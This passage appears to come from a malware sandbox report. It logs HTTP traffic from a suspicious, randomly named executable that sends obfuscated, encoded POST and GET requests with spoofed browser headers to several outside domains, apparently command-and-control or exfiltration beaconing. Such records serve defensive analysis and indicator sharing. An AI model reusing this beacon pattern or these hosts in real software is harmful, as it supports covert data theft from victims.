                                                                                            Data Ascii: pZxtux=FD5fONH9UoGPvs474IzzClyD9qs5pB13XLL4OxEl2V/6wq6on8oR4/2zvxeBQ/GXCn0u3MNP1oPeJdV3Ybbv2x1xNH/Pl5Rn242h5R+4fPNv9fuqzkiDU1nELVV4UInfgU3OT4hy2JZ9GM5vUmwryAYyT4UlyamnPHwYgSrlyqPdbdoMVOreRmsTufJt/gNqsyTDrkY=
                                                                                            Oct 24, 2024 15:30:11.752505064 CEST | 959 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:11 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 815
                                                                                            Connection: close
                                                                                            Content-Type: text/html
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            6 | 192.168.2.5 | 49989 | 69.57.163.227 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:13.620799065 CEST | 693 | OUT | POST /mdol/ HTTP/1.1
                                                                                            Host: www.mireela.pro
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.mireela.pro
                                                                                            Referer: http://www.mireela.pro/mdol/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=FD5fONH9UoGPgvg76pzzOVychas5gh0+XLH4O08P2nb6wLKom5IR//2z7heOffGMCn4I3JNP1rzeJcl3bsHs1B1kM3/JrZRn242h5VvlfPVv6smq8liAdVnLdFV4QInbgU3gT9JM2Lh9GJVvUyko4AYONIVc7YDRJ04nrCqRpo/TarZmPsj2CGAr+MBauQsD2RDz1zOBITvdpeHIvh4iYuTet+CU
                                                                                            Oct 24, 2024 15:30:14.308830023 CEST | 959 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:14 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 815
                                                                                            Connection: close
                                                                                            Content-Type: text/html
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            7 | 192.168.2.5 | 49990 | 69.57.163.227 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:16.168088913 CEST | 1710 | OUT | POST /mdol/ HTTP/1.1
                                                                                            Host: www.mireela.pro
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.mireela.pro
                                                                                            Referer: http://www.mireela.pro/mdol/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:30:16.846338987 CEST | 959 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:16 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 815
                                                                                            Connection: close
                                                                                            Content-Type: text/html
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            8 | 192.168.2.5 | 49991 | 69.57.163.227 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:18.710788965 CEST | 412 | OUT | GET /mdol/?pZxtux=IBR/N437Xoj/lvQ/yaypF1iCxq0JhxtvQ9XvO2IN6lbwsaKUqIYSoc7J5DfSIcjVFUNu75pY4qnkQs5YcPPLlBdqXD3XopUqxrOy0G+yXtR7yOmR4k+PDTzACkBBVYCXxA==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.mireela.pro
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:30:19.376859903 CEST | 974 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:19 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 815
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            9 | 192.168.2.5 | 49992 | 3.33.130.190 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:24.489821911 CEST | 679 | OUT | POST /uao9/ HTTP/1.1
                                                                                            Host: www.micrhyms.info
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.micrhyms.info
                                                                                            Referer: http://www.micrhyms.info/uao9/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=tuk1l9qtrPIRddpNpSEc3ng/gvkEFyAdkjLyG0nxAwks79tRamhCjJBsgtM3lRz+DCiGGPIYzWSZU5ZaIe2PWrpt0Tf8b7kZAT+kQym5eMDNSIL3BjDRccdV9xUGnBt60IKY8ORKNAJ+emQ0RB46IjC814cLMkIBr3SnBTEAUEk9wI3krsIWx0Vv0J/6FiQ7jMFb+O4=


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            10 | 192.168.2.5 | 49993 | 3.33.130.190 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:27.026582003 CEST | 699 | OUT | POST /uao9/ HTTP/1.1
                                                                                            Host: www.micrhyms.info
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.micrhyms.info
                                                                                            Referer: http://www.micrhyms.info/uao9/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=tuk1l9qtrPIRd8ZNv1ocxHg8uPkEPSAZkjHyGwe2ACws6cdRbnhCiJBsrNM24hzhDDeOGNcYzWGZU4paIpKMHrpvyTf6GrkZAT+kQyyTeMbNSYb3BHfSR8dWqBUGjBt+0IK68NVgNGF+ek40RQ41DjC67YdkEmRetkS8EgtnJy8J1+GOxOA+iU5Xka3NUSxS5vVrgZvuPD4TUD5jK76HZcyBzu09


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            11 | 192.168.2.5 | 49994 | 3.33.130.190 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:29.573106050 CEST | 1716 | OUT | POST /uao9/ HTTP/1.1
                                                                                            Host: www.micrhyms.info
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.micrhyms.info
                                                                                            Referer: http://www.micrhyms.info/uao9/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            12 | 192.168.2.5 | 49995 | 3.33.130.190 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:32.117247105 CEST | 414 | OUT | GET /uao9/?pZxtux=gsMVmNPJ8N9SSsJhvzgfzwwjqe07CXl0sVKqNnzNMDh6tN9OUV5g1ZhKr/MfkgGiHAPXbKUUpWb7OZdwItOAW4YYmA3iTr55JhOSegfIcMD9E8fUPg/eNtps2xYGlBIlpg==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.micrhyms.info
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:30:32.736443043 CEST | 403 | IN | HTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Thu, 24 Oct 2024 13:30:32 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 263
                                                                                            Connection: close
                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pZxtux=gsMVmNPJ8N9SSsJhvzgfzwwjqe07CXl0sVKqNnzNMDh6tN9OUV5g1ZhKr/MfkgGiHAPXbKUUpWb7OZdwItOAW4YYmA3iTr55JhOSegfIcMD9E8fUPg/eNtps2xYGlBIlpg==&C6=EXkTb"}</script></head></html>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            13 | 192.168.2.5 | 49996 | 162.241.63.77 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:38.088742971 CEST | 688 | OUT | POST /62tt/ HTTP/1.1
                                                                                            Host: www.estrela-b.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.estrela-b.online
                                                                                            Referer: http://www.estrela-b.online/62tt/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=7c5XRYbmwMaD4ncWIoTNloryviW6Wh4IaBG2EAVjHNeZwOzhweVnuxqJKUTJNDdTN5O5bzC8fIW0hGyTv8Dmw6YMFHTBke1XuKZw3ThV27iWqFb7S0FMsz0USWYcSyMMkKsBQqaoFULUjornscQEkpnuPxah/lGshILyWG0/dis8RVWXoyWeik8+k+A/kGSPTkeM1co=
                                                                                            Oct 24, 2024 15:30:38.835983992 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:38 GMT
                                                                                            Server: Apache
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade
                                                                                            Vary: Accept-Encoding
                                                                                            Content-Encoding: gzip
                                                                                            X-Newfold-Cache-Level: 2
                                                                                            X-Endurance-Cache-Level: 2
                                                                                            X-nginx-cache: WordPress
                                                                                            Content-Length: 1168
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Oct 24, 2024 15:30:38.836030960 CEST | 330 | IN


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            14 | 192.168.2.5 | 49997 | 162.241.63.77 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:40.639650106 CEST | 708 | OUT | POST /62tt/ HTTP/1.1
                                                                                            Host: www.estrela-b.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.estrela-b.online
                                                                                            Referer: http://www.estrela-b.online/62tt/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=7c5XRYbmwMaD5HMWPP/NjIr1qiW6ZB4MaBC2EF04H/6ZzvDhxfVnpxqJB0TISTcfN5Sbb3K8fM20hHiTuPrhxqYKe3TDge1XuKZw3Qdz276Wq1L7SWtPwD0XVWYcWyMIkKs3QvzzFXjUjqjnsuoHtpnkBRbS2H3b7IPmen1oDRw9ZDn9yQe2xEQG0tII12zmJHO8rL8zgDLYEZDN80UbgBwXFPTh
                                                                                            Oct 24, 2024 15:30:41.357713938 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:41 GMT
                                                                                            Server: Apache
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade
                                                                                            Vary: Accept-Encoding
                                                                                            Content-Encoding: gzip
                                                                                            X-Newfold-Cache-Level: 2
                                                                                            X-Endurance-Cache-Level: 2
                                                                                            X-nginx-cache: WordPress
                                                                                            Content-Length: 1168
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Oct 24, 2024 15:30:41.357779026 CEST | 330 | IN


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            15 | 192.168.2.5 | 49998 | 162.241.63.77 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:43.187164068 CEST | 1725 | OUT | POST /62tt/ HTTP/1.1
                                                                                            Host: www.estrela-b.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.estrela-b.online
                                                                                            Referer: http://www.estrela-b.online/62tt/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:30:43.924860001 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:43 GMT
                                                                                            Server: Apache
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade
                                                                                            Vary: Accept-Encoding
                                                                                            Content-Encoding: gzip
                                                                                            X-Newfold-Cache-Level: 2
                                                                                            X-Endurance-Cache-Level: 2
                                                                                            X-nginx-cache: WordPress
                                                                                            Content-Length: 1168
                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            16 | 192.168.2.5 | 49999 | 162.241.63.77 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:45.731126070 CEST | 417 | OUT | GET /62tt/?C6=EXkTb&pZxtux=2eR3StT9zNfU5ywUIZ2bgc3wtAC6ZBxlVhDhLCkeE+XsifzX8e145y6CEXHpSzhKOpTYXTK9W4/Sjnixpdzg8oxocmzQgcw2k7hIxSEQ8Yn0gG/bTm5M3gQ9SHUsYy5BmA== HTTP/1.1
                                                                                            Host: www.estrela-b.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:30:47.324660063 CEST | 584 | IN | HTTP/1.1 301 Moved Permanently
                                                                                            Date: Thu, 24 Oct 2024 13:30:46 GMT
                                                                                            Server: nginx/1.23.4
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://estrela-b.online/62tt/?C6=EXkTb&pZxtux=2eR3StT9zNfU5ywUIZ2bgc3wtAC6ZBxlVhDhLCkeE+XsifzX8e145y6CEXHpSzhKOpTYXTK9W4/Sjnixpdzg8oxocmzQgcw2k7hIxSEQ8Yn0gG/bTm5M3gQ9SHUsYy5BmA==
                                                                                            X-Newfold-Cache-Level: 2
                                                                                            X-Endurance-Cache-Level: 2
                                                                                            X-nginx-cache: WordPress
                                                                                            X-Server-Cache: true
                                                                                            X-Proxy-Cache: MISS
                                                                                            Oct 24, 2024 15:30:47.325606108 CEST | 584 | IN | HTTP/1.1 301 Moved Permanently
                                                                                            Date: Thu, 24 Oct 2024 13:30:46 GMT
                                                                                            Server: nginx/1.23.4
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://estrela-b.online/62tt/?C6=EXkTb&pZxtux=2eR3StT9zNfU5ywUIZ2bgc3wtAC6ZBxlVhDhLCkeE+XsifzX8e145y6CEXHpSzhKOpTYXTK9W4/Sjnixpdzg8oxocmzQgcw2k7hIxSEQ8Yn0gG/bTm5M3gQ9SHUsYy5BmA==
                                                                                            X-Newfold-Cache-Level: 2
                                                                                            X-Endurance-Cache-Level: 2
                                                                                            X-nginx-cache: WordPress
                                                                                            X-Server-Cache: true
                                                                                            X-Proxy-Cache: MISS
                                                                                            Oct 24, 2024 15:30:47.327075005 CEST | 584 | IN | HTTP/1.1 301 Moved Permanently
                                                                                            Date: Thu, 24 Oct 2024 13:30:46 GMT
                                                                                            Server: nginx/1.23.4
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://estrela-b.online/62tt/?C6=EXkTb&pZxtux=2eR3StT9zNfU5ywUIZ2bgc3wtAC6ZBxlVhDhLCkeE+XsifzX8e145y6CEXHpSzhKOpTYXTK9W4/Sjnixpdzg8oxocmzQgcw2k7hIxSEQ8Yn0gG/bTm5M3gQ9SHUsYy5BmA==
                                                                                            X-Newfold-Cache-Level: 2
                                                                                            X-Endurance-Cache-Level: 2
                                                                                            X-nginx-cache: WordPress
                                                                                            X-Server-Cache: true
                                                                                            X-Proxy-Cache: MISS


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            17 | 192.168.2.5 | 50000 | 141.193.213.11 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:56.762798071 CEST | 697 | OUT | POST /zdt7/ HTTP/1.1
                                                                                            Host: www.meanttobebroken.org
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.meanttobebroken.org
                                                                                            Referer: http://www.meanttobebroken.org/zdt7/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:30:57.455123901 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding
                                                                                            x-powered-by: WP Engine
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a530c0bb2ea02-DFW
                                                                                            Content-Encoding: gzip
                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            18 | 192.168.2.5 | 50001 | 141.193.213.11 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:59.309420109 CEST | 717 | OUT | POST /zdt7/ HTTP/1.1
                                                                                            Host: www.meanttobebroken.org
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.meanttobebroken.org
                                                                                            Referer: http://www.meanttobebroken.org/zdt7/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:31:00.032210112 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:59 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding
                                                                                            x-powered-by: WP Engine
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a531bfb01e5c2-DFW
                                                                                            Content-Encoding: gzip
                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            19 | 192.168.2.5 | 50002 | 141.193.213.11 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:01.854455948 CEST | 1734 | OUT | POST /zdt7/ HTTP/1.1
                                                                                            Host: www.meanttobebroken.org
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.meanttobebroken.org
                                                                                            Referer: http://www.meanttobebroken.org/zdt7/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:31:02.537142992 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:31:02 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding
                                                                                            x-powered-by: WP Engine
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a532bdfc4e510-DFW
                                                                                            Content-Encoding: gzip
                                                                                            alt-svc: h3=":443"; ma=86400


